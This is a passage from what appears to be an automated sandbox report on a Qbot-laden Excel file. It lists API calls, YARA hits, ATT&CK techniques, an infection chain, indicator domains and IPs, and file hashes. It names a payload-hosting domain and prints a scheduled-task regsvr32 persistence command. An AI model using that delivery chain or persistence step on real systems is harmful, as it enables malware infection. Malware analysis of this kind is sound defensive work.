                      Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000005.00000002.2371071962.0000000000ED0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042E9CF GetSystemTimeAsFileTime,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004388FD lstrcpynA,lstrcpynA,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,LookupAccountNameW,lstrcpynA,MultiByteToWideChar,lstrcpynA,LookupAccountNameW,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00435A4F GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,lstrcpynA,GetCurrentProcessId,MultiByteToWideChar,GetTickCount,GetModuleFileNameW,lstrlenA,GetOEMCP,lstrlenA,GetCurrentProcessId,GetCurrentProcess,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcessId,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,MultiByteToWideChar,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,MultiByteToWideChar,GetOEMCP,lstrlenW,GetOEMCP,GetOEMCP,lstrlenA,GetCurrentProcess,lstrcpynA,memset,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,GetVersionExA,lstrlenA,GetCurrentProcessId,GetCurrentProcess,GetOEMCP,GetOEMCP,lstrcpynA,lstrcpynA,GetWindowsDirectoryW,lstrlenA,GetCurrentProcessId,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,lstrcpynA,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,
                      Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected QbotShow sources
                      Source: Yara matchFile source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected QbotShow sources
                      Source: Yara matchFile source: 00000004.00000002.2102507416.0000000000420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102454877.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2102490286.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2370755015.0000000000080000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.420000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.230174.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsScripting11Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools11Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsProcess Injection412Deobfuscate/Decode Files or Information1Input Capture11Account Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Scheduled Task/Job1Scripting11Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesCredential API Hooking1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSSystem Information Discovery27Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading121Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection412Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 382839 Sample: document-1055791644.xls Startdate: 06/04/2021 Architecture: WINDOWS Score: 100 41 Found malware configuration 2->41 43 Multi AV Scanner detection for dropped file 2->43 45 Sigma detected: Schedule REGSVR windows binary 2->45 47 9 other signatures 2->47 9 EXCEL.EXE 89 47 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 39 tidymasters.com.au 103.50.162.157, 443, 49165 PUBLIC-DOMAIN-REGISTRYUS India 9->39 35 C:\Users\user\AppData\Local\...\0702[1].gif, PE32 9->35 dropped 57 Document exploit detected (UrlDownloadToFile) 9->57 16 rundll32.exe 9->16         started        18 regsvr32.exe 14->18         started        20 regsvr32.exe 14->20         started        file5 signatures6 process7 process8 22 rundll32.exe 16->22         started        25 regsvr32.exe 18->25         started        27 regsvr32.exe 20->27         started        signatures9 49 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 22->49 51 Injects code into the Windows Explorer (explorer.exe) 22->51 53 Writes to foreign memory regions 22->53 55 3 other signatures 22->55 29 explorer.exe 8 1 22->29         started        process10 file11 37 C:\Users\user\iojhsfgv.dvers, PE32 29->37 dropped 59 Drops PE files to the user root directory 29->59 61 Uses schtasks.exe or at.exe to add and modify task schedules 29->61 33 schtasks.exe 29->33         started        signatures12 process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      document-1055791644.xls52%VirustotalBrowse
                      document-1055791644.xls48%ReversingLabsDocument-Word.Trojan.Abracadabra

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif30%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif93%ReversingLabsWin32.Trojan.QBot
                      C:\Users\user\iojhsfgv.dvers5%MetadefenderBrowse
                      C:\Users\user\iojhsfgv.dvers11%ReversingLabs

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.8a0000.4.unpack100%AviraHEUR/AGEN.1108767Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      tidymasters.com.au2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      tidymasters.com.au
                      103.50.162.157
                      truefalseunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpfalse
                        high
                        http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.comrundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpfalse
                              high
                              http://www.%s.comPArundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2116197122.0000000000D40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000004.00000002.2108474827.0000000003620000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2371170734.00000000022D0000.00000002.00000001.sdmp, taskeng.exe, 00000009.00000002.2370918414.0000000000840000.00000002.00000001.sdmpfalse
                                high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2109220005.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102833114.0000000002197000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpfalse
                                  high
                                  http://servername/isapibackend.dllregsvr32.exe, 0000000A.00000002.2117402574.0000000000A30000.00000002.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://investor.msn.com/rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpfalse
                                    high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    103.50.162.157
                                    tidymasters.com.auIndia
                                    394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:382839
                                    Start date:06.04.2021
                                    Start time:18:39:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 39s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:document-1055791644.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@18/14@1/1
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 50.7% (good quality ratio 49.8%)
                                    • Quality average: 87%
                                    • Quality standard deviation: 22.1%
                                    HCA Information:
                                    • Successful, ratio: 78%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.42, 205.185.216.10, 2.20.142.209, 2.20.142.210
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    18:40:46API Interceptor18x Sleep call for process: rundll32.exe modified
                                    18:40:48API Interceptor410x Sleep call for process: explorer.exe modified
                                    18:40:52API Interceptor1x Sleep call for process: schtasks.exe modified
                                    18:40:53Task SchedulerRun new task: wwzkbggu path: regsvr32.exe s>-s "C:\Users\user\iojhsfgv.dvers"
                                    18:40:53API Interceptor419x Sleep call for process: taskeng.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    103.50.162.157http://www.stevegoadart.com/INCORRECT-INVOICE/Get hashmaliciousBrowse
                                    • credibleinteriors.in/nxcPA/
                                    Invoice Number 750084.docGet hashmaliciousBrowse
                                    • credibleinteriors.in/nxcPA/
                                    Invoice Number 750084.docGet hashmaliciousBrowse
                                    • credibleinteriors.in/nxcPA/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    tidymasters.com.aucontract (39).xlsGet hashmaliciousBrowse
                                    • 103.50.162.157

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    PUBLIC-DOMAIN-REGISTRYUSdocuments-1660683173.xlsmGet hashmaliciousBrowse
                                    • 111.118.215.222
                                    swift Copy.xls.exeGet hashmaliciousBrowse
                                    • 208.91.199.225
                                    document-1848152474.xlsmGet hashmaliciousBrowse
                                    • 199.79.62.99
                                    FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
                                    • 208.91.199.223
                                    MV TBN.uslfze.exeGet hashmaliciousBrowse
                                    • 208.91.199.224
                                    purchase order.exeGet hashmaliciousBrowse
                                    • 208.91.199.223
                                    AD1-2001028L.exeGet hashmaliciousBrowse
                                    • 208.91.199.224
                                    AD1-2001028L (2).exeGet hashmaliciousBrowse
                                    • 208.91.199.224
                                    document-1048628209.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1771131239.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1370071295.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-69564892.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1320073816.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-184653858.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1729033050.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1268722929.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-540475316.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-1456634656.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-12162673.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169
                                    document-997754822.xlsGet hashmaliciousBrowse
                                    • 5.100.155.169

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    7dcce5b76c8b17472d024758970a406bfinal po PP-11164.pptGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    OrderSheet.ppsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1848152474.xlsmGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    appraisal document.docGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1048628209.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1771131239.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1370071295.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-69564892.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1320073816.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-184653858.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1729033050.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1268722929.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-540475316.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1456634656.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-12162673.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-997754822.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1376447212.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1813856412.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1776123548.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157
                                    document-1201008736.xlsGet hashmaliciousBrowse
                                    • 103.50.162.157

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifcontract (39).xlsGet hashmaliciousBrowse
                                      C:\Users\user\iojhsfgv.dverscontract (39).xlsGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                        Category:dropped
                                        Size (bytes):58596
                                        Entropy (8bit):7.995478615012125
                                        Encrypted:true
                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                        MD5:61A03D15CF62612F50B74867090DBE79
                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):893
                                        Entropy (8bit):7.366016576663508
                                        Encrypted:false
                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                        Malicious:false
                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):326
                                        Entropy (8bit):3.129251112301174
                                        Encrypted:false
                                        SSDEEP:6:kKv4skwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:X4skwTJrkPlE99SNxAhUe0ht
                                        MD5:6F5D58912EFB7858B30F1B182AF23A51
                                        SHA1:521C6ED36CBBD5068CB8825241792BE5F51DF647
                                        SHA-256:D41CB8811B9B6111C126A072135A1BF31E4C8B1ECE07E6D8C9044D1A153BD5AB
                                        SHA-512:FB81A3F381FE17153448331F27179A10126C11F9145E875E798FF1A56D476C7F59690B4CAB1E07BACEF63898AE7515C325A80FD2BEBD80A1D323328F8C3DB525
                                        Malicious:false
                                        Preview: p...... ........]...O+..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):252
                                        Entropy (8bit):3.018531379206123
                                        Encrypted:false
                                        SSDEEP:3:kkFklu+lltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK1unliBAIdQZV7eAYLit
                                        MD5:C7FB7A4D96D51871E4FFB2D3001E9449
